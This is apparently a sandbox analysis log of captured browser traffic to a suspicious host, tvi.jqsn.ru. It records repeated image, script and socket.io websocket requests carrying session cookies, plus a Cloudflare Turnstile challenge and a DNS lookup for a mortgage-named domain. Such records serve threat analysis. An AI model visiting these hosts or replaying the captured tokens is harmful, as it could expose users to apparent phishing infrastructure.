laravel_session=eyJpdiI6IkdPOEpFbEs1K3NpNkpnVUNoWmNsclE9PSIsInZhbHVlIjoiSit0R1pFUk0xSlRDVXZCSG1lTmQydFVaL29IOTVqNEF4R1BzZTlCWVVKTThvNUdjOG5pcldUYndYbWc3WFRqMWZIZEQvZWY2bXJEdFhza1BtdnBsQzZJaUt4M3VseUgzL1FvOWYxamZjeTMrQU5nMTBtNWcrVDhsUG1aVXdVRTkiLCJtYWMiOiI4MmE2NjIyZTBiOTgyOGI0N2U5YTkwZjE0MDEzOTA2NzhmZTk1MGRmYzZjNDJiMzk0OGY5Yzk2MGExY2ZlOTExIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /qrroFnG3M60J3FhNqOM0FGt8JF3y5912lJkLOor1EsoLL8YoDCMTx8tUgChmhe8gngUwuef236 HTTP/1.1Host: tvi.jqsn.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkttQzl2ajhJczhiV0NXS3NoTmNQMkE9PSIsInZhbHVlIjoiMEkwMU5RNmtuSE9TcEtVdGlHdWVSRDExZHE3Ukk2YTEzVE9aSHY0V2dGOFpZOWtXSnFqcGVycHU1VFYrdEtIWHFwRS9udUtrMFRsOTlhY1g2aUZyU0FGblRGYXg0bFM1Ym5rbmhUd051Z0hPcnQvalJDWFBuTXVKQ1d1YXI0S3MiLCJtYWMiOiIxYWZlODJmMTZiYjAwODA5NGZkM2IzNjgzNDNmOGJlM2Q5ZDdlMDU5OTU5Y2RjNmRiOTg3MzBkNjU3OWNmZjZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdPOEpFbEs1K3NpNkpnVUNoWmNsclE9PSIsInZhbHVlIjoiSit0R1pFUk0xSlRDVXZCSG1lTmQydFVaL29IOTVqNEF4R1BzZTlCWVVKTThvNUdjOG5pcldUYndYbWc3WFRqMWZIZEQvZWY2bXJEdFhza1BtdnBsQzZJaUt4M3VseUgzL1FvOWYxamZjeTMrQU5nMTBtNWcrVDhsUG1aVXdVRTkiLCJtYWMiOiI4MmE2NjIyZTBiOTgyOGI0N2U5YTkwZjE0MDEzOTA2NzhmZTk1MGRmYzZjNDJiMzk0OGY5Yzk2MGExY2ZlOTExIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1Host: tvi.jqsn.ruConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://tvi.jqsn.ruSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkttQzl2ajhJczhiV0NXS3NoTmNQMkE9PSIsInZhbHVlIjoiMEkwMU5RNmtuSE9TcEtVdGlHdWVSRDExZHE3Ukk2YTEzVE9aSHY0V2dGOFpZOWtXSnFqcGVycHU1VFYrdEtIWHFwRS9udUtrMFRsOTlhY1g2aUZyU0FGblRGYXg0bFM1Ym5rbmhUd051Z0hPcnQvalJDWFBuTXVKQ1d1YXI0S3MiLCJtYWMiOiIxYWZlODJmMTZiYjAwODA5NGZkM2IzNjgzNDNmOGJlM2Q5ZDdlMDU5OTU5Y2RjNmRiOTg3MzBkNjU3OWNmZjZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdPOEpFbEs1K3NpNkpnVUNoWmNsclE9PSIsInZhbHVlIjoiSit0R1pFUk0xSlRDVXZCSG1lTmQydFVaL29IOTVqNEF4R1BzZTlCWVVKTThvNUdjOG5pcldUYndYbWc3WFRqMWZIZEQvZWY2bXJEdFhza1BtdnBsQzZJaUt4M3VseUgzL1FvOWYxamZjeTMrQU5nMTBtNWcrVDhsUG1aVXdVRTkiLCJtYWMiOiI4MmE2NjIyZTBiOTgyOGI0N2U5YTkwZjE0MDEzOTA2NzhmZTk1MGRmYzZjNDJiMzk0OGY5Yzk2MGExY2ZlOTExIiwidGFnIjoiIn0%3DSec-WebSocket-Key: 0S5ndanifdktQoWEQimR6g==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
      Source: global trafficHTTP traffic detected: GET /mnVEZMoPpz26As0HD4QkJNjKc65AwrKklFl1gYZXk0KqRGGuqdpbpq90150 HTTP/1.1Host: tvi.jqsn.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkttQzl2ajhJczhiV0NXS3NoTmNQMkE9PSIsInZhbHVlIjoiMEkwMU5RNmtuSE9TcEtVdGlHdWVSRDExZHE3Ukk2YTEzVE9aSHY0V2dGOFpZOWtXSnFqcGVycHU1VFYrdEtIWHFwRS9udUtrMFRsOTlhY1g2aUZyU0FGblRGYXg0bFM1Ym5rbmhUd051Z0hPcnQvalJDWFBuTXVKQ1d1YXI0S3MiLCJtYWMiOiIxYWZlODJmMTZiYjAwODA5NGZkM2IzNjgzNDNmOGJlM2Q5ZDdlMDU5OTU5Y2RjNmRiOTg3MzBkNjU3OWNmZjZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdPOEpFbEs1K3NpNkpnVUNoWmNsclE9PSIsInZhbHVlIjoiSit0R1pFUk0xSlRDVXZCSG1lTmQydFVaL29IOTVqNEF4R1BzZTlCWVVKTThvNUdjOG5pcldUYndYbWc3WFRqMWZIZEQvZWY2bXJEdFhza1BtdnBsQzZJaUt4M3VseUgzL1FvOWYxamZjeTMrQU5nMTBtNWcrVDhsUG1aVXdVRTkiLCJtYWMiOiI4MmE2NjIyZTBiOTgyOGI0N2U5YTkwZjE0MDEzOTA2NzhmZTk1MGRmYzZjNDJiMzk0OGY5Yzk2MGExY2ZlOTExIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /st3CKdA1E60seZo3gCfEdAgXfvZofZpPsO67oS2XmMLiToqXxnMH34BvGEv93TuvNhmLgh252 HTTP/1.1Host: tvi.jqsn.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkttQzl2ajhJczhiV0NXS3NoTmNQMkE9PSIsInZhbHVlIjoiMEkwMU5RNmtuSE9TcEtVdGlHdWVSRDExZHE3Ukk2YTEzVE9aSHY0V2dGOFpZOWtXSnFqcGVycHU1VFYrdEtIWHFwRS9udUtrMFRsOTlhY1g2aUZyU0FGblRGYXg0bFM1Ym5rbmhUd051Z0hPcnQvalJDWFBuTXVKQ1d1YXI0S3MiLCJtYWMiOiIxYWZlODJmMTZiYjAwODA5NGZkM2IzNjgzNDNmOGJlM2Q5ZDdlMDU5OTU5Y2RjNmRiOTg3MzBkNjU3OWNmZjZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdPOEpFbEs1K3NpNkpnVUNoWmNsclE9PSIsInZhbHVlIjoiSit0R1pFUk0xSlRDVXZCSG1lTmQydFVaL29IOTVqNEF4R1BzZTlCWVVKTThvNUdjOG5pcldUYndYbWc3WFRqMWZIZEQvZWY2bXJEdFhza1BtdnBsQzZJaUt4M3VseUgzL1FvOWYxamZjeTMrQU5nMTBtNWcrVDhsUG1aVXdVRTkiLCJtYWMiOiI4MmE2NjIyZTBiOTgyOGI0N2U5YTkwZjE0MDEzOTA2NzhmZTk1MGRmYzZjNDJiMzk0OGY5Yzk2MGExY2ZlOTExIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /ijsDamms1S0iGERMnflyzrJHXLzG9i2LUxCn8wGgzh2Sw78163 HTTP/1.1Host: tvi.jqsn.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkttQzl2ajhJczhiV0NXS3NoTmNQMkE9PSIsInZhbHVlIjoiMEkwMU5RNmtuSE9TcEtVdGlHdWVSRDExZHE3Ukk2YTEzVE9aSHY0V2dGOFpZOWtXSnFqcGVycHU1VFYrdEtIWHFwRS9udUtrMFRsOTlhY1g2aUZyU0FGblRGYXg0bFM1Ym5rbmhUd051Z0hPcnQvalJDWFBuTXVKQ1d1YXI0S3MiLCJtYWMiOiIxYWZlODJmMTZiYjAwODA5NGZkM2IzNjgzNDNmOGJlM2Q5ZDdlMDU5OTU5Y2RjNmRiOTg3MzBkNjU3OWNmZjZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdPOEpFbEs1K3NpNkpnVUNoWmNsclE9PSIsInZhbHVlIjoiSit0R1pFUk0xSlRDVXZCSG1lTmQydFVaL29IOTVqNEF4R1BzZTlCWVVKTThvNUdjOG5pcldUYndYbWc3WFRqMWZIZEQvZWY2bXJEdFhza1BtdnBsQzZJaUt4M3VseUgzL1FvOWYxamZjeTMrQU5nMTBtNWcrVDhsUG1aVXdVRTkiLCJtYWMiOiI4MmE2NjIyZTBiOTgyOGI0N2U5YTkwZjE0MDEzOTA2NzhmZTk1MGRmYzZjNDJiMzk0OGY5Yzk2MGExY2ZlOTExIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /wx3DGb43mykL3VQGKZs4rsXyO8wG7fTCt1TRnhO0Dn3uab176 HTTP/1.1Host: tvi.jqsn.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkttQzl2ajhJczhiV0NXS3NoTmNQMkE9PSIsInZhbHVlIjoiMEkwMU5RNmtuSE9TcEtVdGlHdWVSRDExZHE3Ukk2YTEzVE9aSHY0V2dGOFpZOWtXSnFqcGVycHU1VFYrdEtIWHFwRS9udUtrMFRsOTlhY1g2aUZyU0FGblRGYXg0bFM1Ym5rbmhUd051Z0hPcnQvalJDWFBuTXVKQ1d1YXI0S3MiLCJtYWMiOiIxYWZlODJmMTZiYjAwODA5NGZkM2IzNjgzNDNmOGJlM2Q5ZDdlMDU5OTU5Y2RjNmRiOTg3MzBkNjU3OWNmZjZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdPOEpFbEs1K3NpNkpnVUNoWmNsclE9PSIsInZhbHVlIjoiSit0R1pFUk0xSlRDVXZCSG1lTmQydFVaL29IOTVqNEF4R1BzZTlCWVVKTThvNUdjOG5pcldUYndYbWc3WFRqMWZIZEQvZWY2bXJEdFhza1BtdnBsQzZJaUt4M3VseUgzL1FvOWYxamZjeTMrQU5nMTBtNWcrVDhsUG1aVXdVRTkiLCJtYWMiOiI4MmE2NjIyZTBiOTgyOGI0N2U5YTkwZjE0MDEzOTA2NzhmZTk1MGRmYzZjNDJiMzk0OGY5Yzk2MGExY2ZlOTExIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /op9nJ96mWPUqO6569NQJB0Igha1bclYFfgOjFPonTi9mJHOHcd200 HTTP/1.1Host: tvi.jqsn.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkttQzl2ajhJczhiV0NXS3NoTmNQMkE9PSIsInZhbHVlIjoiMEkwMU5RNmtuSE9TcEtVdGlHdWVSRDExZHE3Ukk2YTEzVE9aSHY0V2dGOFpZOWtXSnFqcGVycHU1VFYrdEtIWHFwRS9udUtrMFRsOTlhY1g2aUZyU0FGblRGYXg0bFM1Ym5rbmhUd051Z0hPcnQvalJDWFBuTXVKQ1d1YXI0S3MiLCJtYWMiOiIxYWZlODJmMTZiYjAwODA5NGZkM2IzNjgzNDNmOGJlM2Q5ZDdlMDU5OTU5Y2RjNmRiOTg3MzBkNjU3OWNmZjZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdPOEpFbEs1K3NpNkpnVUNoWmNsclE9PSIsInZhbHVlIjoiSit0R1pFUk0xSlRDVXZCSG1lTmQydFVaL29IOTVqNEF4R1BzZTlCWVVKTThvNUdjOG5pcldUYndYbWc3WFRqMWZIZEQvZWY2bXJEdFhza1BtdnBsQzZJaUt4M3VseUgzL1FvOWYxamZjeTMrQU5nMTBtNWcrVDhsUG1aVXdVRTkiLCJtYWMiOiI4MmE2NjIyZTBiOTgyOGI0N2U5YTkwZjE0MDEzOTA2NzhmZTk1MGRmYzZjNDJiMzk0OGY5Yzk2MGExY2ZlOTExIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /qrroFnG3M60J3FhNqOM0FGt8JF3y5912lJkLOor1EsoLL8YoDCMTx8tUgChmhe8gngUwuef236 HTTP/1.1Host: tvi.jqsn.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkttQzl2ajhJczhiV0NXS3NoTmNQMkE9PSIsInZhbHVlIjoiMEkwMU5RNmtuSE9TcEtVdGlHdWVSRDExZHE3Ukk2YTEzVE9aSHY0V2dGOFpZOWtXSnFqcGVycHU1VFYrdEtIWHFwRS9udUtrMFRsOTlhY1g2aUZyU0FGblRGYXg0bFM1Ym5rbmhUd051Z0hPcnQvalJDWFBuTXVKQ1d1YXI0S3MiLCJtYWMiOiIxYWZlODJmMTZiYjAwODA5NGZkM2IzNjgzNDNmOGJlM2Q5ZDdlMDU5OTU5Y2RjNmRiOTg3MzBkNjU3OWNmZjZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdPOEpFbEs1K3NpNkpnVUNoWmNsclE9PSIsInZhbHVlIjoiSit0R1pFUk0xSlRDVXZCSG1lTmQydFVaL29IOTVqNEF4R1BzZTlCWVVKTThvNUdjOG5pcldUYndYbWc3WFRqMWZIZEQvZWY2bXJEdFhza1BtdnBsQzZJaUt4M3VseUgzL1FvOWYxamZjeTMrQU5nMTBtNWcrVDhsUG1aVXdVRTkiLCJtYWMiOiI4MmE2NjIyZTBiOTgyOGI0N2U5YTkwZjE0MDEzOTA2NzhmZTk1MGRmYzZjNDJiMzk0OGY5Yzk2MGExY2ZlOTExIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /gh3d1Su1ZMSNEeyJPN3dlD5HYNxJxn0j0e3KmnqYP7SY4gSOJsbl0uFlr87ref210 HTTP/1.1Host: tvi.jqsn.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkttQzl2ajhJczhiV0NXS3NoTmNQMkE9PSIsInZhbHVlIjoiMEkwMU5RNmtuSE9TcEtVdGlHdWVSRDExZHE3Ukk2YTEzVE9aSHY0V2dGOFpZOWtXSnFqcGVycHU1VFYrdEtIWHFwRS9udUtrMFRsOTlhY1g2aUZyU0FGblRGYXg0bFM1Ym5rbmhUd051Z0hPcnQvalJDWFBuTXVKQ1d1YXI0S3MiLCJtYWMiOiIxYWZlODJmMTZiYjAwODA5NGZkM2IzNjgzNDNmOGJlM2Q5ZDdlMDU5OTU5Y2RjNmRiOTg3MzBkNjU3OWNmZjZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdPOEpFbEs1K3NpNkpnVUNoWmNsclE9PSIsInZhbHVlIjoiSit0R1pFUk0xSlRDVXZCSG1lTmQydFVaL29IOTVqNEF4R1BzZTlCWVVKTThvNUdjOG5pcldUYndYbWc3WFRqMWZIZEQvZWY2bXJEdFhza1BtdnBsQzZJaUt4M3VseUgzL1FvOWYxamZjeTMrQU5nMTBtNWcrVDhsUG1aVXdVRTkiLCJtYWMiOiI4MmE2NjIyZTBiOTgyOGI0N2U5YTkwZjE0MDEzOTA2NzhmZTk1MGRmYzZjNDJiMzk0OGY5Yzk2MGExY2ZlOTExIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /st3CKdA1E60seZo3gCfEdAgXfvZofZpPsO67oS2XmMLiToqXxnMH34BvGEv93TuvNhmLgh252 HTTP/1.1Host: tvi.jqsn.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkttQzl2ajhJczhiV0NXS3NoTmNQMkE9PSIsInZhbHVlIjoiMEkwMU5RNmtuSE9TcEtVdGlHdWVSRDExZHE3Ukk2YTEzVE9aSHY0V2dGOFpZOWtXSnFqcGVycHU1VFYrdEtIWHFwRS9udUtrMFRsOTlhY1g2aUZyU0FGblRGYXg0bFM1Ym5rbmhUd051Z0hPcnQvalJDWFBuTXVKQ1d1YXI0S3MiLCJtYWMiOiIxYWZlODJmMTZiYjAwODA5NGZkM2IzNjgzNDNmOGJlM2Q5ZDdlMDU5OTU5Y2RjNmRiOTg3MzBkNjU3OWNmZjZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdPOEpFbEs1K3NpNkpnVUNoWmNsclE9PSIsInZhbHVlIjoiSit0R1pFUk0xSlRDVXZCSG1lTmQydFVaL29IOTVqNEF4R1BzZTlCWVVKTThvNUdjOG5pcldUYndYbWc3WFRqMWZIZEQvZWY2bXJEdFhza1BtdnBsQzZJaUt4M3VseUgzL1FvOWYxamZjeTMrQU5nMTBtNWcrVDhsUG1aVXdVRTkiLCJtYWMiOiI4MmE2NjIyZTBiOTgyOGI0N2U5YTkwZjE0MDEzOTA2NzhmZTk1MGRmYzZjNDJiMzk0OGY5Yzk2MGExY2ZlOTExIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1Host: tvi.jqsn.ruConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://tvi.jqsn.ruSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkttQzl2ajhJczhiV0NXS3NoTmNQMkE9PSIsInZhbHVlIjoiMEkwMU5RNmtuSE9TcEtVdGlHdWVSRDExZHE3Ukk2YTEzVE9aSHY0V2dGOFpZOWtXSnFqcGVycHU1VFYrdEtIWHFwRS9udUtrMFRsOTlhY1g2aUZyU0FGblRGYXg0bFM1Ym5rbmhUd051Z0hPcnQvalJDWFBuTXVKQ1d1YXI0S3MiLCJtYWMiOiIxYWZlODJmMTZiYjAwODA5NGZkM2IzNjgzNDNmOGJlM2Q5ZDdlMDU5OTU5Y2RjNmRiOTg3MzBkNjU3OWNmZjZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdPOEpFbEs1K3NpNkpnVUNoWmNsclE9PSIsInZhbHVlIjoiSit0R1pFUk0xSlRDVXZCSG1lTmQydFVaL29IOTVqNEF4R1BzZTlCWVVKTThvNUdjOG5pcldUYndYbWc3WFRqMWZIZEQvZWY2bXJEdFhza1BtdnBsQzZJaUt4M3VseUgzL1FvOWYxamZjeTMrQU5nMTBtNWcrVDhsUG1aVXdVRTkiLCJtYWMiOiI4MmE2NjIyZTBiOTgyOGI0N2U5YTkwZjE0MDEzOTA2NzhmZTk1MGRmYzZjNDJiMzk0OGY5Yzk2MGExY2ZlOTExIiwidGFnIjoiIn0%3DSec-WebSocket-Key: qoxSASM6VH2mZMtoTaEyjQ==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
      Source: global trafficHTTP traffic detected: GET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1Host: tvi.jqsn.ruConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://tvi.jqsn.ruSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkttQzl2ajhJczhiV0NXS3NoTmNQMkE9PSIsInZhbHVlIjoiMEkwMU5RNmtuSE9TcEtVdGlHdWVSRDExZHE3Ukk2YTEzVE9aSHY0V2dGOFpZOWtXSnFqcGVycHU1VFYrdEtIWHFwRS9udUtrMFRsOTlhY1g2aUZyU0FGblRGYXg0bFM1Ym5rbmhUd051Z0hPcnQvalJDWFBuTXVKQ1d1YXI0S3MiLCJtYWMiOiIxYWZlODJmMTZiYjAwODA5NGZkM2IzNjgzNDNmOGJlM2Q5ZDdlMDU5OTU5Y2RjNmRiOTg3MzBkNjU3OWNmZjZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdPOEpFbEs1K3NpNkpnVUNoWmNsclE9PSIsInZhbHVlIjoiSit0R1pFUk0xSlRDVXZCSG1lTmQydFVaL29IOTVqNEF4R1BzZTlCWVVKTThvNUdjOG5pcldUYndYbWc3WFRqMWZIZEQvZWY2bXJEdFhza1BtdnBsQzZJaUt4M3VseUgzL1FvOWYxamZjeTMrQU5nMTBtNWcrVDhsUG1aVXdVRTkiLCJtYWMiOiI4MmE2NjIyZTBiOTgyOGI0N2U5YTkwZjE0MDEzOTA2NzhmZTk1MGRmYzZjNDJiMzk0OGY5Yzk2MGExY2ZlOTExIiwidGFnIjoiIn0%3DSec-WebSocket-Key: or0UEKeR5dkerPNQYVsm7Q==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
      Source: global trafficHTTP traffic detected: GET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1Host: tvi.jqsn.ruConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://tvi.jqsn.ruSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkttQzl2ajhJczhiV0NXS3NoTmNQMkE9PSIsInZhbHVlIjoiMEkwMU5RNmtuSE9TcEtVdGlHdWVSRDExZHE3Ukk2YTEzVE9aSHY0V2dGOFpZOWtXSnFqcGVycHU1VFYrdEtIWHFwRS9udUtrMFRsOTlhY1g2aUZyU0FGblRGYXg0bFM1Ym5rbmhUd051Z0hPcnQvalJDWFBuTXVKQ1d1YXI0S3MiLCJtYWMiOiIxYWZlODJmMTZiYjAwODA5NGZkM2IzNjgzNDNmOGJlM2Q5ZDdlMDU5OTU5Y2RjNmRiOTg3MzBkNjU3OWNmZjZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdPOEpFbEs1K3NpNkpnVUNoWmNsclE9PSIsInZhbHVlIjoiSit0R1pFUk0xSlRDVXZCSG1lTmQydFVaL29IOTVqNEF4R1BzZTlCWVVKTThvNUdjOG5pcldUYndYbWc3WFRqMWZIZEQvZWY2bXJEdFhza1BtdnBsQzZJaUt4M3VseUgzL1FvOWYxamZjeTMrQU5nMTBtNWcrVDhsUG1aVXdVRTkiLCJtYWMiOiI4MmE2NjIyZTBiOTgyOGI0N2U5YTkwZjE0MDEzOTA2NzhmZTk1MGRmYzZjNDJiMzk0OGY5Yzk2MGExY2ZlOTExIiwidGFnIjoiIn0%3DSec-WebSocket-Key: MNndqb1+gtcvapOhZeqxvQ==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
      Source: unknownDNS traffic detected: queries for: bestohiomortgagerate.com
      Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/376309965:1713310987:XtWNF_lGr5ooSfnAjw_nRac0X3c-4XXJ9QQQN9vg0as/875854595e7f53f2/ce9d72d10a780bc HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 2574sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: ce9d72d10a780bcsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/8so0y/0x4AAAAAAAWQVeGKc1PBnczu/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Apr 2024 00:34:21 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Apr 2024 00:34:28 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockCache-Control: max-age=14400Age: 7215Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H%2Fdah5A1d7hlg7hb04ppSsBJKMsf%2Bt6RPJ9%2BUEYcjiaSTzWY3T1dulP4JjnTYNxn6TpaCo4FHB58wFDZjPCXCP00rT3ecBmbaeYu3IKZ7NwB5HG89WpUPCGX%2BbcISQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400CF-Cache-Status: HITServer: cloudflareCF-RAY: 875854604cc87bab-ATL
